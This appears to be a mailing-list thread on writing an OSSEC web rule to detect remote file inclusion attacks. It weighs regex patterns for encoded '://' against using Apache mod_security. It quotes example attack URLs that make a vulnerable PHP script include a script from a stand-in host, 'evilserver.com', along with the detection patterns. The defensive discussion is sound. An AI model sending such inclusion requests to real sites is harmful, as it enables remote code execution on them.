[EMAIL PROTECTED] a écrit :
>
> [EMAIL PROTECTED] a écrit :
>> on web_rules.xml (add ~ line 46)
>> <url>%3A|%2F|:|/</url>
>> for block as a XSS attack or a SQL attack log type:
>> http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt
>>
>>
>> http://mywebsite.com/vulnerable_script.php?include=http%3a%2f%2fevilserver.com%2fevil_script.txt
>>
>>
>>
>> ( for block many script kiddy from:
>> http://www.milw0rm.com/search.php?dong=include )
>>
> On that kind of problematic (obfuscation) might I suggest Mod_Security
> (http://www.modsecurity.org/) ?
>
> Mod_Security is a module for apache to filter that kind of attack, it
> automatically traducts obfuscation to have less filter to work out.
thanks for the mod of apache,
>
> %3a and %2f are not always bad. (some Lotus Domino webserver add them,
> as well as cgi proxies).
right, i have made a litle edit
<url>%3A%2F%2F|://</url> (just for :// in the request)
>
> It will be a pain in the ass to filter any combination of encoding.
yes ;) but not if the web rules are coupled with a url_encode function
to encode all request in %XX (and url_decode)
(i don't not if is possible, no i think...)
>
> And in my opinion, if you use ossec to filter, you are too late...
not realy, because the attacker are blocked by a reponse-active of ossec
he use this type of attack,
but right, isn't a good idea (the best idea is just not use vulnerable
script)
> With mod_security, the attack doesn't even reach the web server.
>
> Just my two cents...
>
> Sioban
>
